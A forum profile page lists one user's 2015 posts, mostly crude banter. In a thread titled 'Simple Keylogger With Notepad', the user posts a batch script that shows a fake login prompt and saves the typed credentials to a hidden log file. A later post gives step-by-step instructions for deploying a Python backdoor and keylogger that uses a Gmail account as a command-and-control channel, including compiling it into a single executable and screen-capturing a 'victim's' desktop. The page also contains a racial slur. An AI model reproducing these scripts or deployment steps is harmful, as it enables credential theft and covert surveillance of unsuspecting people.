User Controls
Posts by Hewfil1
-
2015-07-20 at 7:08 PM UTC in §m£ÂgØL's Zoo: Japanese Spider Crab
-
2015-07-20 at 6:53 PM UTC in Simple Keylogger With Notepad
Yes but what ya'll niggers are forgetting is that if you don't have your keylogger contact a remote host to send everything it logs your program is basically useless, no offense.
Here's something more useful.
Backdoor with keylogger for windows.
https://github.com/byt3bl33d3r/gcat/...ter/implant.py
And your controller.
https://github.com/byt3bl33d3r/gcat/blob/master/gcat.py
You'll need python of courrse and these libs: (They have to be installed)
http://sourceforge.net/projects/pywin32/
http://sourceforge.net/projects/pyhook/
You'll also need to go into your python folder and find pip.exe to install that module so you can screencap your victim's desktop.
You're going to have to setup a gmail as command and control server and have to tell the program where to send and recieve commands from you do that by changing the following variables:
#######################################
gmail_user = 'example@gmail.com'
gmail_pwd = 'password'
server = "smtp.gmail.com"
server_port = 587
#######################################
Change variable gmail_user to equal the adress you set up. Change variable gmail_pwd to equal the password you created for that account.
You're going to have to compile implant.py with py2exe.
http://sourceforge.net/projects/py2exe/
Your controller gcat you can just run from the command line.
Lanny was kind enough to hook me up with a script to help compile implant.py. Open up your favorite text editor and enter the following code and save it as setup.py
try:
# py2exe 0.6.4 introduced a replacement modulefinder.
# This means we have to add package paths there, not to the built-in
# one. If this new modulefinder gets integrated into Python, then
# we might be able to revert this some day.
# if this doesn't work, try import modulefinder
try:
import py2exe.mf as modulefinder
except ImportError:
import modulefinder
import win32com, sys
for p in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", p)
for extra in ["win32com.shell"]: #,"win32com.mapi"
__import__(extra)
m = sys.modules[extra]
for p in m.__path__[1:]:
modulefinder.AddPackagePath(extra, p)
except ImportError:
# no build path setup, no worries.
pass
from distutils.core import setup
import py2exe
setup(console=["implant.py"], options={"py2exe": {"packages": ["email"]}})
When that's done open up a command prompt and use the command cd to go to the directory where you have saved implant.py and setup.py and run the command: python setup.py py2exe, to compile. If you're smart you'll structure your command like this -> "python setup.py py2exe >> log.txt" then you can check what your terminal outputs in the dump log.txt to see if everything went well.
Note: You may want to use https://github.com/pyinstaller/pyinstaller instead of py2exe because py2xe had some problems importing the email modules.
Major props to lanny for helping me out with this backdoor with gmal as C&C server <3. I was kind of excited so i thought i'd share, if you have any questions i'll try to answer them, it took me a bit and i am still fiddling with program but i do believe i got everything to work i am currently testing it's functionality. Also before i foget after you compile you're going to have some directories and implant.exe, you're going to have to get all of your dependencies in a single file it's a little more involved with py2.exe but with pyinstaller it's as simple as adding –onefile to the command line when compiling. Which is why you might want to opt for pyinstaller in general.
Badass as always Soph. \m/ -
2015-07-20 at 8:27 AM UTC in Music Theads?Ah, sorry. I'm half asleep and didn't notice.
-
2015-07-20 at 3:45 AM UTC in Music Theads?So do threads about music just go into Moving Pictures or what? We used to have separate threads for music and tv and stuff, so I'm not sure.
-
2015-07-20 at 3:42 AM UTC in §m£ÂgØL's Zoo: Japanese Spider CrabWaiting for, "§m£ÂgØL's Zoo. Someone fucked the dolphin."
-
2015-07-20 at 3:40 AM UTC in I converted someones soul to the dark side by masturbating to thoughts of their deathKek. Kek.
-
2015-07-20 at 3:05 AM UTC in Simple Keylogger With Notepad
Very nifty little trick. How much does the program interfere as the user goes about their buisness? Or more concisely how much effort would an unsuspecting user need to put into noticing the program to find it? let's assume the logs file has been moved to a deep system folder rather than the desktop to circumvent that issue.
It doesn't stay on the desktop. That folder gets moved to a system folder. SO unless they check it, they would have no clue, BUT the .bat would need to be executed remotely without their knowledge to allow the logging to start.
*Recheck my post. The folder gets drug into the C:\* -
2015-07-19 at 7:18 PM UTC in Simple Keylogger With Notepad
why not just use keepass x or something?
Because I don't want to. I like the keylogger because it requires an effort on my part. -
2015-07-19 at 5:31 PM UTC in Simple Keylogger With Notepad
If you change the word after C:in line 8 to something different, can you name the folder on your desktop that same name?
forgive the dumb question, I suck at computers.
You could try. I haven't done it considering I only use mine for saving passwords because I have to change them constantly.
-
2015-07-17 at 1:40 AM UTC in Give me ideas for a program to build
-
2015-07-15 at 5:22 PM UTC in Give me ideas for a program to build
Write a remote access trojan.
All new meaning to RAT. -
2015-07-15 at 1:10 AM UTC in INFOSEC Company 'Hacking Team' Hacked, 400gb of data leaked.Original files were taken off Mega.
-
2015-07-15 at 1:01 AM UTC in Simple Keylogger With NotepadThe following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.
Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.
Start by opening Notepad, then pasting in the following code:
@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
Make a folder on your desktop called "Logs". It must be logs or it will not work.
Drag that folder into C:\
Now run a test of your "Logger.bat".
Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.
Enjoy! -
2015-07-09 at 8:22 PM UTC in Recent PostsWhere the fuck is the sidebar? You know we're lazy and don't want to have to look for shit.
-
2015-06-28 at 10:17 PM UTC in How do I load my avatarNero. <3
-
2015-06-28 at 6:53 PM UTC in Do you think Sploo's parents considered abortion?They just prefer to keep him comatose in the basement.